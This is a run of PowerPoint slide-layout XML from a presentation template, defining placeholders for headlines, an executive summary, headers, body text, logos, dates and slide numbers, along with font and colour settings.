        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 53">
            <a:extLst>
              <a:ext uri="{B7D0B0F7-7504-4C04-A1C8-8440DC5721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6B4C3C-BBFB-4F17-8B67-E0A1ACE4C93A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6501048" y="2039376"/>
            <a:ext cx="1275416" cy="473852"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{6F1AFECA-0E22-448E-A0FB-3F62EC902BF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319A613-DF52-4E5E-8A5E-355E8E08A8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214437"/>
            <a:ext cx="5976299" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{54AB21FB-50D9-4CFE-8350-FC8553AE13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3E81869-C1FE-4C47-BC28-EB732EF77361}"/>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29" name="Title 28">
            <a:extLst>
              <a:ext uri="{5A26F857-1BDC-4E58-B785-8FA02C750DF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66D699-EE04-4075-9A57-EB6791D0CB79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="11"/>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30" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{30958D70-64E0-466B-A51C-87195C44180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8BB156D-4B1C-49B7-A735-F68EB0C29F6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="12"/>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CD5DD6B4-70BC-4C6E-BB4C-20E19E8EE04B}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{81439B64-99C0-4FEE-AC82-88F3D7300F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87294D6-1024-4DF6-9802-54B5FA6AAE96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="13"/>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6143A08B-BF25-40DF-8D70-315F2607716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xecutive Summary">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{E03535D2-0DE7-4F61-A867-3B18EE41188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927B107-4B18-4704-84B1-3929D3BFC898}"/>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4D103532-1F70-4FCB-9552-AB7CCAE1FB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7E35905-C82E-4340-8B0B-885DF0B3E401}"/>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98000475-1149-4A14-98F5-B7C6DC4F2220}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{367590DA-C2C1-40E9-B824-070BDD9B63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2156388-6D13-4700-97FD-5E0283C083FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7972425" y="4746804"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{938DDFFA-1F6E-4F17-A4D6-3F83E3F349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E1FB57-D73F-47EE-A893-75C100382492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214437"/>
            <a:ext cx="2303392" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{8BB14440-2DC9-48B6-99B3-EB0C3E93B33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9B4ADE-E694-470A-AA57-EF581AFD53C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{BB6332EC-0333-4E1E-8DB9-A5EB393F62E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EDC2EB-DDDD-4918-A01C-ADF3E3C52201}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1809750"/>
            <a:ext cx="2303049" cy="1746513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400"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stStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brief summary / description of the project – Remember, Strong slides are a support for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your entire presentation, not a substitute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your presentation is a live experience carried by the presenter so it’s important to visually represent your points without asking your audience to divide their attention too much.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{D5E11BC7-5C9C-4883-9EB4-21449D972F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EC1856-DE89-471F-B67A-CB53BB170A7E}"/>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107F3DB8-C324-449A-AD12-980EC0D4AE3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4D964B-709D-4327-8742-EF2C124C4C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2996812" y="1214437"/>
            <a:ext cx="4643437" cy="2342616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" lvl="4" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Unica 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8CCB213C-D435-4985-8EB2-CE306B23230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FBCD3C-767E-4EFC-8965-BB8626FD80BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3800475"/>
            <a:ext cx="7258050" cy="704183"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="2800" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 10">
            <a:extLst>
              <a:ext uri="{E7821F86-C182-430C-9E26-4349996B3E0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37EA58-F8E4-41CE-A2D1-46B427141859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>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12" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{A7AE7A9F-5C36-4BB9-BE6E-AA41E6E1BB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8EF7C9A-30CB-4C7C-8F97-EE8FB1918FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="7"/>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E73C0521-0551-424F-BF1B-51E3262157A3}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{F5795340-4C9B-4E39-8D5A-1FDB117DA36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E650C37-DBDD-4D11-852A-848AB9B966EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="8"/>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82FB5741-1155-4061-9514-3AC04A72466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Rectangle 8">
            <a:extLst>
              <a:ext uri="{CA141509-7F74-41CE-B054-0ED95D449FF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B6CECE6-60E7-4871-8F6D-B7D6D6466EDC}"/>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Rectangle 10">
            <a:extLst>
              <a:ext uri="{F7E427A5-DE7F-480A-BF79-5FA45BD9ED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FBABF1-A725-4A24-8C45-78718ABB44DF}"/>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4" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{16055B66-F9A7-4585-9421-A58ECB6517D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34368F-1754-4533-A3B1-52B94D158AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429125" y="923898"/>
            <a:ext cx="4104242" cy="3488556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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5">
            <a:extLst>
              <a:ext uri="{5764CDB2-7C1A-4ABB-B694-72541B108F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169C99-5D24-4C89-B4E7-777CB8E20D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3478B6"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9FAB81C3-39E2-4060-AAB3-B5F94827B770}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Picture Placeholder 18">
            <a:extLst>
              <a:ext uri="{158D16EE-8040-4C2F-A315-973D997FED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8822DD-8B31-46D0-80BE-FA3A2ED56704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980760" y="4746804"/>
            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{33E27383-5B42-4E02-A2F9-324F84C1401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386814-C18F-41A6-AB52-E0C9F02EBB19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1209675"/>
            <a:ext cx="3359524" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D14B24"/>
                </a:solidFill>
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{68545A64-2376-40CC-A0F6-A5A8FB2EF7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CF5D150-589D-4410-8834-54D7721D615B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="1209675"/>
            <a:ext cx="3524250" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:defRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{EA6501A5-F82F-4E41-A8DC-899AF35909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F48723-D95E-44BE-8509-33AC37BFBCBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-253447" y="4778237"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{808EECB4-45AE-4D04-AC4A-3B9FDD841F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98418A-9273-45E6-B3D7-55DD34799A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1809750"/>
            <a:ext cx="3369468" cy="2344893"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FEF62C17-262C-4F2C-8FF3-BCFCA16326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8275E3D-6890-4990-9D7C-F45BF0A9C59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="1809750"/>
            <a:ext cx="3521135" cy="2316451"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add body text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11">
            <a:extLst>
              <a:ext uri="{6C0510E1-D27A-482D-AAEE-7F09FBC2BE2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4A2260-86CF-4651-8540-2F03AB918C24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>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13" name="Date Placeholder 1">
